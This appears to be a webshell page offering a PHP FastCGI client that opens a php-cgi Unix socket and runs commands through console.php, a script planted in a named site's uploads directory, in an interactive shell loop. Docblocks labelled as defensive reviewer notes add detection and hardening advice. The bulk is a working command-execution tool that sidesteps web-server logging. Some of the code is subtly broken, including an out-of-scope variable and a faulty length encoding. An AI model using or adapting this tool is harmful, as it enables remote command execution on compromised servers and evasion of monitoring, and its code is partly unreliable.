🔓 Ultimate Webshell - Penetration Testing Tool

📖 File Reader

<?php
// FastCGI client to execute commands via php-cgi socket - authorized pentest tool
// Target: /www/wwwroot/hljrlsj.com/public/uploads/file/20260310/console.php

/**
 * Writes one FastCGI request to an already-open stream.
 *
 * Records are written in this order: a BEGIN_REQUEST record, one PARAMS
 * record per entry of the hard-coded CGI environment below, an empty PARAMS
 * record, then an empty STDIN record. Nothing is read back here and the
 * fwrite() results are not checked.
 *
 * Reviewer note (defensive): every CGI variable, including SCRIPT_FILENAME,
 * DOCUMENT_ROOT and REMOTE_ADDR, is chosen by this client and not by a web
 * server. Anything the target script logs from these values (for example a
 * 127.0.0.1 peer address) reflects what the client wrote, so it should not be
 * treated as evidence of where the request came from.
 *
 * @param resource $socket     Presumably a stream resource; it is only passed to fwrite() here.
 * @param int      $requestId  Packed into the request-id field of every record header.
 * @param string   $scriptFile Sent to the backend as SCRIPT_FILENAME.
 * @param string   $cmd        URL-encoded and appended to REQUEST_URI as the "cmd" query parameter.
 * @return void                There is no return statement.
 */
function send_fcgi_request($socket, $requestId, $scriptFile, $cmd) {
    // FCGI_BEGIN_REQUEST (type 1): header followed by an 8-byte body built by the inner pack('NN', 0, 1)
    $beginRequest = pack('CCnnCa*', 1, 1, $requestId, 8, 0, pack('NN', 0, 1)); // FCGI_RESPONDER role
    fwrite($socket, $beginRequest);
    
    // FCGI_PARAMS records: the CGI environment the backend is asked to run with.
    // Only SCRIPT_FILENAME and REQUEST_URI depend on the arguments; the rest is fixed.
    $params = [
        'REQUEST_METHOD' => 'GET',
        'SCRIPT_FILENAME' => $scriptFile,
        'SCRIPT_NAME' => '/console.php',
        'REQUEST_URI' => '/console.php?cmd=' . urlencode($cmd),
        'DOCUMENT_ROOT' => '/www/wwwroot/hljrlsj.com/public',
        'SERVER_SOFTWARE' => 'php-fcgi',
        'REMOTE_ADDR' => '127.0.0.1',
        'REMOTE_PORT' => '12345',
        'SERVER_ADDR' => '127.0.0.1',
        'SERVER_PORT' => '80',
        'SERVER_PROTOCOL' => 'HTTP/1.1',
        'CONTENT_TYPE' => '',
        'CONTENT_LENGTH' => '0'
    ];
    
    // Each name/value pair is sent as its own PARAMS record.
    foreach ($params as $name => $value) {
        $nameLen = strlen($name);
        $valueLen = strlen($value);
        // Lengths below 128 are written as a single byte; for longer ones the code emits
        // chr(128 | (len >> 24)) followed by the 4-byte big-endian length.
        $nameLenByte = $nameLen < 128 ? chr($nameLen) : chr(128 | ($nameLen >> 24)) . pack('N', $nameLen);
        $valueLenByte = $valueLen < 128 ? chr($valueLen) : chr(128 | ($valueLen >> 24)) . pack('N', $valueLen);
        
        $paramData = $nameLenByte . $valueLenByte . $name . $value;
        $contentLen = strlen($paramData);
        // Pad the record body up to the next multiple of 8 bytes.
        $paddingLen = (8 - ($contentLen % 8)) % 8;
        // Header fields as packed: version 1, type 4, request id, content length, padding length.
        $header = pack('CCnnC', 1, 4, $requestId, $contentLen, $paddingLen); // FCGI_PARAMS
        fwrite($socket, $header . $paramData . str_repeat("\0", $paddingLen));
    }
    
    // Empty FCGI_PARAMS terminator
    $header = pack('CCnnC', 1, 4, $requestId, 0, 0);
    fwrite($socket, $header);
    
    // FCGI_STDIN with 0 length terminator
    $header = pack('CCnnC', 1, 5, $requestId, 0, 0); // FCGI_STDIN
    fwrite($socket, $header);
}

/**
 * Sends one request carrying $cmd to a local php-cgi Unix socket and returns
 * the text that comes back.
 *
 * The socket path and the script path are hard-coded. The script named as
 * SCRIPT_FILENAME is a .php file inside a dated upload directory under the
 * site's public tree.
 *
 * Reviewer notes (defensive):
 *  - The client connects to the FastCGI socket itself, not to an HTTP
 *    listener, so this traffic is unlikely to show up in web-server access
 *    logs or pass through HTTP-layer filtering; look at process and
 *    socket-level auditing on the host instead.
 *  - Indicators visible in this block: a PHP file under an uploads path, and
 *    a local process other than the web server opening /tmp/php-cgi-73.sock.
 *  - Hardening that addresses what is shown here: serve upload directories
 *    without PHP execution, and restrict who may open the FastCGI socket
 *    (owner/mode on the socket file). Confirm both against the actual server
 *    configuration, which is not visible on this page.
 *
 * @param string $cmd Value passed through to send_fcgi_request().
 * @return string     Trimmed contents of the first <body>...</body> match in the
 *                    raw response, or the whole trimmed response when there is no match.
 */
function exec_cmd_via_fcgi($cmd) {
    $socketPath = '/tmp/php-cgi-73.sock';
    $scriptFile = '/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/console.php';
    
    // 5-second connect timeout; '@' suppresses the PHP warning so only the die() message is shown.
    $socket = @stream_socket_client("unix://$socketPath", $errno, $errstr, 5);
    if (!$socket) {
        // Terminates the whole script, not just this call.
        die("Failed to connect to FastCGI socket: $errstr ($errno)\n");
    }
    
    // 10-second read/write timeout on the stream; the request id is fixed at 1.
    stream_set_timeout($socket, 10);
    send_fcgi_request($socket, 1, $scriptFile, $cmd);
    
    // Read until EOF, or until a read returns false or an empty string.
    $output = '';
    while (!feof($socket)) {
        $data = fread($socket, 8192);
        if ($data === false || $data === '') break;
        $output .= $data;
    }
    fclose($socket);
    
    // The response is not decoded as FastCGI records here: the raw bytes are searched
    // for an HTML <body> element and, failing that, returned as received.
    if (preg_match('/<body[^>]*>(.*)<\/body>/is', $output, $matches)) {
        return trim($matches[1]);
    }
    return trim($output);
}

// Interactive loop: prints a banner, then repeatedly reads one line from STDIN and
// hands it to exec_cmd_via_fcgi(), echoing whatever that returns.
// Reviewer note (defensive): this is a command-line script (it reads STDIN), so it runs
// as a local process on the host where the socket lives. Process-creation auditing for a
// PHP CLI started from a web-writable directory is a relevant detection point; where the
// file was actually stored is not visible on this page.
echo "FastCGI Command Execution Shell (via console.php)\n";
echo "Socket: $socketPath | Target: console.php\n\n";

while (true) {
    echo "fcgi> ";
    $cmd = trim(fgets(STDIN));
    // "exit" or "quit" ends the loop; input that empty() treats as empty is skipped.
    if ($cmd === 'exit' || $cmd === 'quit') break;
    if (empty($cmd)) continue;
    
    $result = exec_cmd_via_fcgi($cmd);
    echo $result . "\n\n";
}
?>